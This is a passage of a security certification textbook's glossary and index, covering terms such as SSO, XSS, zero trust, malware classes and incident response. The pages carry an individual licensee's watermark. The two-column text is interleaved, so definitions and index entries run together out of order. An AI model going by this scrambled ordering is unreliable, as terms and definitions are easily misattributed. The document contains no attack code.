pseudorandom stream initialized by a
and that runs on TCP port 22.
secret key.
SSID (service set identifier) A character
stress test A software testing method
string that identifies a particular wireless
that evaluates how software performs
LAN (WLAN).
under extreme load.
SSO (single sign-on) An authentication
supplicant In EAP architecture, the device
technology that enables a user
requesting access to the network.
to authenticate once and receive
authorizations for multiple services. SWG (secure web gateway) An appliance
or proxy server that mediates client
SSTP (Secure Socket Tunneling
connections with the Internet by filtering
Protocol) A protocol that uses the HTTP
spam and malware and enforcing access
over SSL protocol and encapsulates an IP
restrictions on types of sites visited, time
packet with a PPP header and then with
spent, and bandwidth consumed.
an SSTP header.
symmetric encryption A two-way
standard naming convention Applying
encryption scheme in which encryption
consistent names and labels to assets
and decryption are both performed by
and digital resources/identities within a
the same key. Also known as shared-key
configuration management system.
encryption.
stapling Mechanism used to mitigate
syslog A protocol enabling different
performance and privacy issues when
appliances and software applications to
requesting certificate status from an OCSP
transmit logs or event records to a central
responder.
server.
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-24 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-25
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-26 | Glossary
war driving The practice of using a Wi-Fi XML injection Attack method where
sniffer to detect WLANs and then either malicious XML is passed as input to
making use of them (if they are open/ exploit a vulnerability in the target app.
unsecured) or trying to break into them
XOR (exclusive OR) An operation that
(using WEP and WPA cracking tools).
outputs to true only if one input is true
warm site A location that is dormant and the other input is false.
or performs noncritical functions under
XSRF (cross-site request forgery) A
normal conditions, but which can be
malicious script hosted on the attacker's
rapidly converted to a key operations site
site that can exploit a session started on
if needed.
another site in the same browser. Also
watering hole attack An attack in which known as client-side request forgery or
an attacker targets specific groups or CSRF.
organizations, discovers which websites
XSS (cross-site scripting) A malicious
they frequent, and injects malicious code
script hosted on the attacker's site or
into those sites.
coded in a link injected onto a trusted
WEP (Wired Equivalent Privacy) A legacy site designed to compromise clients
mechanism for encrypting data sent over browsing the trusted site, circumventing
a wireless connection. the browser's security model of trusted
zones.
whaling An email-based or web-based
form of phishing which targets senior zero trust Security design paradigm
executives or wealthy individuals. where any request (host-to-host
or container-to-container) must be
white team Staff administering,
authenticated before being allowed.
evaluating, and supervising a penetration
test or incident response exercise. zero-day A vulnerability in software that is
unpatched by the developer or an attack
WinHex Forensics tool for Windows that
that exploits such a vulnerability.
allows collection and inspection of binary
code in disk and memory images. zero-fill A method of sanitizing a drive by
setting all bits to zero.
worm A type of malware that replicates
in system memory and can spread over ZigBee Low-power wireless
network connections rather than infecting communications open source protocol
files. used primarily for home automation.
ZigBee uses radio frequencies in the 2.4
WPA (Wi-Fi Protected Access) Standards
GHz band and a mesh topology.
for authenticating and encrypting access
to Wi-Fi networks. Also known as WPA2, Z-Wave Low-power wireless
WPA3. communications protocol used primarily
for home automation. Z-Wave uses radio
WPS (Wi-Fi Protected Setup) A feature
frequencies in the high 800 to low 900
of WPA and WPA2 that allows enrollment
MHz and a mesh topology.
in a wireless network based on an 8-digit
PIN.
XaaS (anything as a service) Expressing
the concept that most types of IT
requirements can be deployed as a cloud
service model.
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index
Page numbers with Italics represent charts, graphs, and diagrams.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-2 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-3
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-4 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-5
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-6 | Index
carving, files, 495 digital certificates, 106, 126 Choose Your Own Device
CASB (cloud access security GlobalSign, 127 (CYOD), 344
broker), 272 GoDaddy, 127 chosen ciphertext attack, 109
cat command, 278 hierarchical (Intermediate Chuvakin, Anton, “Magic
CBC. see cipher block chaining CA), 127‑128 Quadrant” reports, 328
(CBC) mode IdentTrust, 127 CIA Triad. see confidentiality,
CBC (cipher block chaining) online vs offline CAs, 128 integrity, availability (CIA) triad
mode, 108 registration authorities (RAs), cipher, 96
CBT (computer-based 128‑129 cipher block chaining (CBC)
training), 211 Sectigo/Comodo, 127 mode, 108
CCI (co-channel interference), 236 single CA, 127 Cipher Block Chaining Message
CCMP. see cipher block chaining Transport Layer Security Authentication Code Protocol
(CBC) mode (TLS), 292 (CCMP), 237
CCMP (Cipher Block Chaining trust model, 127 cipher suites
Message Authentication Code certificate-based tunneling, 240 cipher block chaining (CBC)
Protocol), 237 certificate chaining, 127‑128 mode, 108
cellular data connections, certificate formats counter mode, 108
356‑357 encoding key exchange/agreement
cellular network, embedded Distinguished Encoding algorithm, 108
systems, 333 Rules (DER), 140 signature algorithm, 108
Center for Internet Security (CIS) Privacy-enhanced Transport Layer Security
benchmarks, 12‑13 Electronic Mail (PEM), 140 (TLS), 108, 293
centralized key management, file extensions, 141 ciphertext, 96
137 P7B format, 141 circuit-based alarm, 544
CER (Crossover Error Rate), PKCS #12 format, 141 CIS benchmarks, 12‑13
172‑173 certificate policies, 132 Cisco
CERT. see computer emergency certificates, update or revoke, 478 Aironet series, 245
response team (CERT) certificates and smart cards, 180 appliance firewall, 260
certificate and key management certificate signing request (CSR), ASA, 266
certificate expiration, 138 128‑129, 142 Cloudlock, 426
certificate formats chain of custody, 485 digital forensics, 487
Distinguished Encoding chain of trust, 127 fog computing, 433
Rules (DER), 140 Challenge Handshake IP Flow Information Export
file extensions, 141 Authentication Protocol (CHAP), (IPFIX), 473
P7B format, 141 158, 304 logs, 168
PKCS #12 format, 141 change control, 530, 532 SAFE architecture, 216
Privacy-enhanced change management, 530, 532 CISO, 4
Electronic Mail (PEM), 140 CHAP (Challenge Handshake CIS-RAM. see Risk Assessment
issues with, 143 Authentication Protocol), 158, 304 Method (CIS-RAM)
life cycle of, 137. see also key checksum Citrix
management digital signatures, 104‑105 ICA, 413
Online Certificate Status hashing algorithms, 97 XenApp, 413‑414
Protocol (OCSP), 139‑140 integrity and resiliency of XEN Server, 412
OpenSSL, 142 data, 113 Citrix Endpoint Management, 345
pinning, 140 Chef cloud orchestration clean agent fire suppression, 552
revocation lists, 138‑139 platform, 430 clean desk policy, 209
certificate attributes, 130 Chief Information Security cleanup, pen test attack life
certificate authority (CA) Officer (CISO), roles and cycle, 70
certificate signing request responsibilities, 4 clickjacking, 376
(CSR), 128‑129 Chief Security Officer (CSO), 4 Client Authentication, 132
defined, 126‑127 Chinese cyber espionage units, 20 client-based errors (400
Digicert, 127 choke firewall, 222 range), 470
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-7
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-8 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-9
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-10 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-11
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-12 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-13
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-14 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-15
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-16 | Index
hardware root of trust (RoT), host-based intrusion detection/ guidelines for implementing,
318‑319 prevention (HIDS)(HIPS), 327 341
hardware security module hosted private cloud, 408 secure filmware,
(HSM), 165, 422 host/environment security implementing
Hashcat, 161 data sanitization tools, boot integrity, 319‑320
hashing 553‑554 disk encryption, 320‑321
database deidentification Faraday Cages, 550 end of life (EOL), 322‑323
methods, 452 fire detection and end of service life (EOSL),
digital signatures, 104‑105 suppression, 551‑552 322‑323
hashing algorithms, 97‑98 hot/cold aisles, 551 hardware root of trust
hashing algorithms HVAC, 550 (RoT), 318‑319
checksum, 97, 104‑105 protected distribution, 550 organizational security
cryptographic ciphers, 97‑98 secure areas, 548‑549 agreements, 323
digital signatures, 104‑105 secure data destruction, third-party risk
hashing, 97‑98, 104‑105 552‑553 management, 322
message digest algorithm host hardware, 411 USB and flash drive
(MDA), 97‑98 host-related intrusion detection security, 321‑322
secure hash algorithm (SHA), systems (HIDS), 272 HOSTS files, 286
97‑98 host security solutions hot aisle/cold aisle
head commands, 278 embedded system security arrangement, 551
health information, 441‑442 implications HOTP (HMAC-based One-Time
Health Insurance Portability and communication Password Algorithm), 168‑169
Accountability Act (HIPPA), 14, considerations, 333‑334 hot plug PSU, 517
444, 504 constraints of, 331‑332 hot site, 532‑533
heating, ventilation, air facility automation, hotspots, 357‑358
conditioning (HVAC), 550 336‑337 hot storage, 422
heat map risk matrix, 503, 506 filmware code control, 339 HR policies. see human
heat maps, 236 industrial control resources (HR) policies
HSM (hardware security
heuristics, 271 systems, 334‑335
module), 165
hibernation file, 492‑493 Internet of Things (IoT),
HTML5 VPN, 310
HIDS (host-related intrusion 335‑336
HTTP access logs, 470
detection systems), 272 logic controllers, 332
HTTP methods, 372‑373
hierarchical (Intermediate CA), medical devices, 338
HttpOnly attributes, 384
127‑128 multifunction printers
HTTPS (hypertext transfer
high availability (HA), 422‑423, (MFPs), 337
protocol secure), 292
516‑517 network segmentation,
HTTP Strict Transport Security
HMAC-based One-Time 338
(HSTS), 385
Password Algorithm (HOTP), vehicles and drones, 338
human-machine interfaces
168‑169 Voice over IP (VoIP), 337 (HMIs), 334
hoaxes, 78‑79 wrappers, 339 human resources (HR) policies
home automation devices, 336 endpoint security account policies
Homeland Security Act, 504 antivirus response, 329 access policies, 191‑192
homomorphic encryption, 121 baseline configuration account attributes, 191
honeyfiles, honey nets, honey and registry setting, 326 account audits, 194
ports, 534‑535 endpoint protection, account lockout and
horizontal (consumer-specific, 327‑328 disablement, 196‑197
cross-sector) legislation, 13‑14 hardening systems, account password policy
horizontal brute force online 325‑326 settings, 192‑193
attacks, 159 next-generation endpoint account permissions, 195
horizontal privilege escalation, protection, 328‑329 account restrictions,
366 patch management, 193‑194
host-based firewall, 260 326‑327 usage audits, 195‑196
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-17
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-18 | Index
IEEE 802.1x port-based NAC disaster recovery plans, information life cycle
(PNAC), 166 462‑463 management, 438‑439
IKE (Internet Key Exchange), forensic procedures, 463 information security
307‑308, 308 guidelines for, 482 benchmarks, 12‑13
image backups, 525‑526 identification of incidents, Cloud frameworks, 11‑12
IMAP4 (Internet Message Access 465‑466 competencies, 3‑4
Protocol v4), 297 incident response plan (IRP), cybersecurity framework, 3
IMAPS (secure IMAP), 297 458‑459 information security
iMessage, 360 incident response process, business units
impact assessment, 442 456‑457 DevSecOps, 5‑6
impersonation, 75‑76 mitigation controls SOC, 5
Imperva, 273 adversarial artificial ISO, 11
Implicit TLS (FTPS), 296 intelligence, 480 regulations, standards, and
impossible travel time/risky content filter legislation, 13‑14
login policy, 194 configuration changes, roles and responsibilities
improper input handling, 367 477‑478 Chief Information Security
in-band connection, 310 endpoint configuration Officer (CISO), 4
incident containment changes, 478‑479 Information Systems
isolation-based containment, eradication and Security Officer (ISSO), 4
475‑476 recovery, 476 secure configuration guides
segmentation-based firewall configuration application servers, 13
containment, 476 changes, 476‑477 network appliance
incident eradication and incident containment, platform, 12‑13
recovery, 476 475‑476 operating systems (OS),
incident response (IR) security orchestration, 12‑13
business continuity plan automation, and vendor-specific guides,
(BCP), 463 response (SOAR), 479 12‑13
communication plan, 458 MITRE ATT&CK, 460‑461 web server applications, 13
continuity of operation playbook/runbook, 459, 479 security controls
planning (COOP), 463 retention policy, 463 compensating controls, 10
cyber incident response simulations, 462 deterrent controls, 10
team (CIRT), 457‑458 stakeholder management, 458 functional types, 9, 10
cyber kill chain attack tabletop exercises, 461‑462 managerial security
framework, 459‑460 walkthrough exercises, 462 control, 8‑10, 9
data sources incident response plan (IRP), operational security
application log files, 458‑459 control, 8‑10, 9
470‑471 incident response process, physical controls, 9, 10
authentication logs, 470 456‑457 technical security
metadata, 471‑472 incineration data destruction, 552 controls, 8‑10, 9
network data sources, incremental backups, 524‑525 security roles, CIA Triad, 2
472‑473 indicator of compromise (IoC), information security business
network log files, 469 28‑29, 277 units
security and information Indoor Positioning System (IPS), DevSecOps, 5‑6
event management 350‑351 SOC, 5
(SIEM), 466‑469 industrial camouflage, 541 Information Sharing and
system and security industrial control systems (ICSs), Analysis Centers (ISACs), threat
logs, 469 334‑335 intelligence providers, 27
vulnerability scan Infiniband, 520 Information Systems Security
outputs, 470 influence campaigns, 82 Officer (ISSO), roles and
Diamond Model of Intrusion information assurance, security responsibilities, 4
Analysis, 461 controls, 8‑10 Information Technology
Infrastructure (ITIL), 530‑531
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-19
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-20 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-21
file system permissions, 200 operational technology (OT) long term retention, 522
head and tail commands, 278 attacks, 248 lookalike domains, 79
ifconfig, 36 persistence, 250 looping statements
iptables, 258‑259 quality of service (QoS), 252 PowerShell, 393
journalctl, 469 scheduling, 250 Python, 391‑392
KALI, 41 site resiliency, 532 scripting, 390
logger command, 278‑279 source IP affinity, 250 loop prevention
memdump, 492 local replication, 422 Bridge Protocol Data Unit
mtr, 37 Local Security Authority (LSA), (BPDU) Guard, 230
Netcat, 46‑47 Windows authentication, 154 broadcast storm prevention,
OpenSSL local service accounts, 185 229
certificate and key location services Spanning Tree Protocol
management, 142 geofencing and camera/ (STP), 228
certificate signing request microphone enforcement, 351 low observable characteristics
(CSR), 142 geolocation, 350‑351 (LOC) attack, fileless malware, 85
root certificates, 141‑142 GPS tagging, 352 LSA (Local Security Authority), 154
ParrotOS, 41 location-based LTE Machine Type
reverse shell, 396 authentication, 152 Communication (LTE-M), 333
root accounts, 184‑185 location-based policies, 193 LulzSec, 20
SEAndroid, 347 Lockheed Martin whitepaper, lunchtime attacks, 77
Secure Erase (SE), 554 Intelligence-Driven Computer
Secure Shell (SSH), 311 Network Defense, 459 M
Security-Enhanced Linux, 347 lockout policy, 349
MAC
Security Module (LSM), 394 log files
address table, 228
service accounts, 186 application log files, 470‑471
cloning, 227
SSH commands, 313 authentication logs, 470
filtering, 230
tcpdump, 42‑43 network log files, 469
flooding, 228‑229
traceroute, 37 system and security logs, 469
limiting, 230
Ubuntu vulnerability scan outputs, 470
network interface hardware
RedHat Linux container, logger command, 278‑279
address, 218‑219
413‑414 logging platforms
MAC (mandatory access
root accounts, 185 journalctl, 469
control), 201
Volatility Framework, 492 NXlog, 469
MAC (message authentication
live acquisition, 492, 493 rsylog, 468
code), 109, 113
live off the land techniques syslog, 468
MacAfee
fileless malware, 85 syslog-ng, 468‑469
data loss prevention (DLP), 450
remote access Trojans (RATs), logic bombs, 89‑90, 416
SkyHigh Networks, 426
86‑87 logic controllers for embedded
machine/computer
load balancers systems, 332
certificates, 134
amplification attack, 247‑248 logic statements, 391‑392, 393
machine learning (ML)
application attacks, 247‑248 logon, 150
techniques, 31
clustering, 250‑251 logs
macros, 396‑397
distributed denial of service aggregation/banding
macro virus, 83
(DDoS), 247, 248‑249 technique, 277
“Magic Quadrant” reports, 328
DNS amplification attack, 248 collection
magnetic hard disk, 553
layer 4 load balancer, 249 agent-based, 276
mailbox access, 296
layer 7 load balancer, 249 listener/collector, 276
mail delivery agent (MDA), 472
network appliances, 217‑218 sensor, 276
Mail Exchanger (MX) record, 296
network redundancy, 518 syslog, 276
mail transfer, 296
Network Time Protocol (NTP), log reviews, 61‑62
mail transfer server, 217
247‑248 monitoring services, 275
mail user agent (MUA), 472
Long Term Evolution (LTE), 333
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-22 | Index
malicious code indicators Obad Android Trojan mean time to repair (MTTR), 511
Bourne Again Shell (Bash) malware, 359 mean time to respond
malicious indicators, 396 process analysis, 90‑91 (MTTR), 479
credential dumping, 394 VM escaping, 414‑415 measured boot, 319‑320
lateral movement/insider Malware Information Sharing measurement systems analysis
attack, 394 Project (MISP), 27 (MSA), 323
macros, 396‑397 MAM (mobile device media sanitization, 552‑553
man-in-the-browser (MitB) management), 345 medical devices, 338
attack, 397 Managed Google Play, 352 memdump, 492
persistence malicious managed power distribution memorandum of understanding
code, 395 units (PDUs), 517 (MOU), 323
PowerShell malicious Managed Security Services memory leak, 368‑369
indicators, 395 Provider (MSSP), 411 memory management, 385
Python malicious indicators, management information base memory resident, viruses, 83
396 (MIB), 289 memory resident malware
shellcode, 394 management plane, 432 fileless malware, 84‑85
Visual Basic for Applications managerial security control, 8 worms, 84‑85
(VBA), 396‑397 mandatory access control (MAC) Memoryze, 492
malicious external threats, 19 authorization solutions, 201 Message Analyzer tool, 472
malicious internal threats, 19 execution control, 394 message authentication code
malicious process, memory Security-Enhanced Linux, 347 (MAC), 109, 113
resident virus, 83 mandatory vacation, 183 message digest algorithm
malware Mandiant’s APT1, 20 (MDA), 97‑98
advance tools against, 329 man-in-the-browser (MitB) metadata
guidelines for, 93 attack, 397 email metadata, 471‑472
malware-based attacks man-in-the-middle attack (MitM) file metadata, 471
bluetooth connection application log files, 471 mobile phone, 472
methods, 358 certificate pinning, 140 web metadata, 471
DLL injection, 369 cryptographic attacks, 116‑117 Metasploit, 45‑46, 91
domain generation algorithm DNS poisoning, 286 MFA (multifactor authentication),
(DGA), 91 firmware over the air 151
fast-flux, 91 updates, 361 MIB (management information
indicators of, 90 high latency indicating, 37 base), 289
malware classifications integrity and resiliency of micro segmentation, 225
adware, 85 data, 113 microservices, 429‑430
backdoors, 86‑87 mutual authentication Microsoft
cookies, 85 preventing, 157 Active Directory (AD), 288
crypto-malware, 89 near field communications Always-on VPN, 308‑309
fileless malware, 84‑85 (NFC), 360 App-V, 413‑414
keylogger, 85‑86 unsecure protocols, 52 Azure
logic bombs, 89‑90 mantraps, 543 Functions, 41
payload, 82 marketing team, incident Information Protection,
potentially unwanted response (IR), 458 440, 450
programs (PUPs), 82, 83 maximum tolerable downtime SQL Database, 409
ransomware, 88‑89 (MTD), 508‑509, 516 Virtual Machines, 409
remote access Trojans MDA (message digest Baseline Security Analyzer
(RATs), 86‑87 algorithm), 97‑98 (MBSA), 326
rootkits, 87‑88 MDM. see mobile device Challenge Handshake
spyware, 85 management (MDM) Authentication Protocol
Trojans, 82, 83 mean time between failures (CHAP), 158
viruses, 82, 83, 83 (MTBF), 510 Cloud App Security, 426
worms, 80, 82, 84‑85 mean time to failure (MTTF), 510 DNS services, 287
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-23
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-24 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-25
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-26 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-27
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-28 | Index
attack profile physical port security and MAC PKCS (Public Key Cryptography
black box, 68 filtering Standards), 129
gray box, 68 Dynamic Host Configuration PKCS #12 format, 141
white box, 68 Protocol (DHCP) snooping, 230 PKI. see public key infrastructure
bug bounty, 68 MAC filtering, 230 (PKI)
defined, 67 MAC limiting, 230 places in the network (PIN)
exercise types, 68‑69 physical security controls SAFE architecture, 216
passive and active guidelines for, 556 Wi-Fi protected setup
reconnaissance, 69‑70 host/environment security (WPS), 239
rules of engagement, 67‑68 data sanitization tools, plaintext, 96, 159
percent encoding, 373 553‑554 platform as a service (PaaS),
performance limitations, Faraday Cages, 550 409, 410
cryptographic weaknesses, fire detection and playbook, 459, 479
113‑114 suppression, 551‑552 Play Protect, 347
permissions policies, 421 hot/cold aisles, 551 plenum, 551
persistence, pen test attack life HVAC, 550 pluggable authentication
cycle, 70 protected distribution, 550 module (PAM), 155
persistence malicious code, 395 secure areas, 548‑549 plug-ins, 59
persistent (closed) cookies, 374 secure data destruction, PNAC. see port-based NAC
persistent storage acquisition, 493 552‑553 (PNAC)
personal area networks (PANs), site security point-to-multipoint (P2M), 362
357, 358‑359 alarm systems and point-to-point (P2P), 361‑362
personal health information sensors, 543‑544 point-to-point protocol (PPP), 304
(PHI), 441‑442 barricades and entry/exit point-to-point tunneling
personal identification number points, 541 protocol (PPTP), 303
(PIN), 150, 154 cable locks, 543 policy server, 449
personally identifiable fencing, 541 polymorphic viruses, 83
information (PII), 441 gateways and locks, POP3S (Post Office Protocol
personally owned device use, 209 542‑543 v3), 297
person-made disasters, 511 industrial camouflage, 541 POP3S (Secure POP), 297
personnel policies for privilege lighting, 541 port-based NAC (PNAC)
management mantraps, 543 IEEE 802.1x port-based NAC,
job rotation, 182 physical access 166
least privilege, principle of, 182 controls, 540 network access control
mandatory vacation, 183 physical attacks of smart (NAC), 231‑232
separation of duties, 182 cards and USB, 543 port filtering/security, 256
pfSense reception personnel and port scan
firewall rule configuration, 258 ID badges, 546 Nmap Security Scanner, 38
Internet Key Exchange security guards and scanless, 41
(IKE), 307 cameras, 544‑545 positive air pressure, 550
log parser, 277 site layout, 540‑541 POST (forms mechanism), 292
Open VPN, 303‑304 piggy backing, 76 post-incident activities phase, 457
PGP (Pretty Good Privacy), PIN (personal identification Post Office Protocol v3
134, 152 number), 150, 154 (POP3S), 297
pharming, 79 PIN (places in the network), post-quantum cryptographic
phishing campaigns, 77‑78, 210 216, 239 technology, 120‑121
physical access controls, 540 pinch point failures, 216 posture assessment, 231
physical controls, 9, 10 Ping of Death, 248 potentially unwanted programs
physical locks, 542 pinning, digital certificates, 140 (PUPs), 82, 83
physically secure cabled pivoting, pen test attack life power redundancy
network, 550 cycle, 70 batter backups, 517
dual power supplies, 517
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-29
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-30 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-31
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-32 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-33
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-34 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-35
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-36 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-37
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-38 | Index
barricades and entry/exit SOAR. see security orchestration, software development kit
points, 541 automation, and response (SDK), 386
cable locks, 543 (SOAR) software development life cycle
fencing, 541 SOC. see security operations (SDLC)
gateways and locks, 542‑543 center (SOC) agile development, 400
industrial camouflage, 541 SOC2. see service organization waterfall model, 400
lighting, 541 control (SOC2) software diversity, 403
mantraps, 543 SOC3. see service organization software exploits, 233
physical access controls, 540 control (SOC3) Software Restriction Policies
physical attacks of smart social engineering techniques (SRP), 394
cards and USB, 543 active reconnaissance, 69 software vulnerabilities, 19, 50‑51
reception personnel and ID credential databases, 77 solid state drives (SSD)
badges, 546 credential harvesting, 82 Instant Secure Erase (ISE), 554
security guards and cameras, defined, 74 nonvolatile storage media, 493
544‑545 dumpster diving, 76 Secure Erase (SE), 554
site layout, 540‑541 guidelines for, 93 secure filmware,
site survey, 236 hoaxes, 78‑79 implementing, 320
site-to-site model, 302 identity fraud, 77 Something You Are
skimming, card attacks, 543 impersonation and trust, Authentication, 151
SkyHigh Networks, 426 75‑76 Something You Can Do
Sleuth Kit, 491 influence campaigns, 82 Authentication, 152
Small Computer System invoice scams, 77 Something You Do
Interface (SCSI), 520 lunchtime attacks, 77 Authentication, 151
smart buildings, 336 pharming, 79 Something You Exhibit
smart card attacks, 543 phishing, 77‑78 Authentication, 152
smart-card authentication, 164 piggy backing, 76 Something You Have
smart cards, 164 prepending, 78‑79 Authentication, 150‑151
smart devices, 335 pretexting, 75‑76 Something You Know
smart meter, 336 principles of, 74‑75 Authentication, 150, 152
smartphone authentication, shoulder surfing, 77 Somewhere You Are
348‑349 SMiShing, 78 Authentication, 152
S/MIMI (Secure/Multipurpose spam, 78‑79 sophistication level, of threat
Internet Mail Extensions), 297‑298 spear phishing, 78 actors, 19
S/MINE (Secure Multipart Internet tailgating, 76 SOPs (standard operating
Message Extensions), 134 typosquatting, 79 procedures), 182, 194
SMiShing, 78 vishing, 77‑78 source IP affinity, 250
SMS (Short Message Service), 170 watering hole attack, 79 source routing vulnerabilities, 233
SMS (simple message service), 78 whaling, 77‑78 SOX. see Sarbanes-Oxley Act (SOX)
SMTPS, 296 social media spam, 78‑79, 86‑87
Smurf, 248 analysis, 208 Spamhaus, open source
Sn1per, exploitation as attack vectors, 23 intelligence (OSINT), 28
frameworks, 46 threat research sources, 28 SPAN (switched port analyzer),
snapshot, 495 social proof, 75 42, 269‑270
snapshot backups, 525‑526 Social Security Number (SSN), 441 Spanning Tree Protocol (STP), 228
sniffing, test access port (TAP), 42 soft power, 82 spear phishing, 78
SNMP (Simple Network software as a service (SaaS), 409 specialized systems
Management Protocol), 38, 275, software compliance and facility automation, 336‑337
289‑290 licensing threat, 502 medical devices, 338
Snort, 268‑269 software-defined networking multifunction printers
snowflake systems, 431 (SDN), 431‑432 (MFPs), 337
SOAP (Simple Object Access software-defined visibility vehicles and drones, 338
Protocol), 204‑205 (SDV), 432 Voice over IP (VoIP), 337
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-39
Special Publications (NIST), 11 transport layer (OSI Layer 4), subscription services, 295
spectrum analyzer, 245 257‑258 substitution cipher, 98
split tunnel, VPN client state laws, 14 superuser account
configuration, 309 stateless operations, 256 identity and account
spoofed routing information stateless protocol, 374 management controls,
(route injections) vulnerabilities, Statements on Standards for 184‑185
233 Attestation Engagements (SSAE), weak host configurations, 51
spyware, 85 11‑12 supervisory control and data
SQL injection attacks, 377‑378 states of data acquisition (SCADA), 334‑335
SRTP (secure transport data at rest, 447 supplicant, 166
protocol), 299 data in processing, 447‑448 supply chain, as attack vectors, 23
SSAE. see Statements on data in transit (motion), 447 supply chain assessment, third-
Standards for Attestation data in use, 447 party risks, 54‑55
Engagements (SSAE) state table, 257 Suricata, 268
SSH. see Secure Shell (SSH) static acquisition, 493 surveillance systems, 336‑337,
SSH client authentication, 312 static and dynamic source 544‑545
SSH commands, 313 NAT, 264 suspended certificates, 138‑139
SSH FTP (SFTP), 296 static code analysis, 387 SWG (secure web gateway), 272
SSID (service set identifier), 235 static known treats, 19 switched port analyzer (SPAN),
SSL (Secure Sockets Layer), 292 statistical deviation analysis, 468 42, 269‑270
SSL VPN, 303‑304 steganography, 121‑122 switches, 217, 469, 518
SSO (single sign-on), 155, 295 STIGs, 12 Symantec
SSRF. see server-side request Stingray/International Mobile Blue Coat, 426
forgery (SSRF) Subscriber Identity (IMSI) data loss prevention (DLP), 450
SSTP (Secure Sockets Tunneling catcher, 361 Symantec/Broadcom, 345
Protocol), 304 storage area networks (SANs), symmetric cipher, 112
stacked overflow, 367 520, 527 symmetric encryption
Staged Payloads, 347 storage profiles, 421 Advanced Encryption
staging, development storage segmentation, 353 Standard (AES), 100
environments, 400 stored procedures, 386 block ciphers, 100
stakeholder management, STP (Spanning Tree Protocol), 228 bulk encryption, 105‑106
incident response (IR), 458 strategic intelligence, 487‑488 cryptographic concepts, 96
standalone intrusion stratum 1 (Top-Level NTP defined, 99
mechanism, 87 servers), 289 digital envelopes, 105‑106
standard naming conventions, stream ciphers, 100 initialization vector (IV), 100
531 stress testing, 387‑388 key Exchange, 105‑106
standard operating procedures structured exception handler key length, 100
(SOPs), 182, 194 (SEH), 385 secret key, 99
standards, 13‑14 structured query language (SQL) stream ciphers, 100
standard users, 183 injection attacks, 377‑378 synchronous replication, 520
stapling, 140 structured threat information SYN flood attacks, 247
Start-Process, 395 eXpression (STIX) Sysinternals, 90‑91
STARTTLS, 288, 296 OASIS CTI framework, 29‑30 syslog, 468
state actors, 20‑21, 21 Trusted Automated syslog-ng, 468‑469
stateful inspection firewalls eXchange of Indicator system accounts, 185
application aware firewalls, Information (TAXII), 30 system and security logs, 469
258 structured threats, 19 system-enforced account
application layer (OSI subject alternative name (SAN), policies, 192‑193
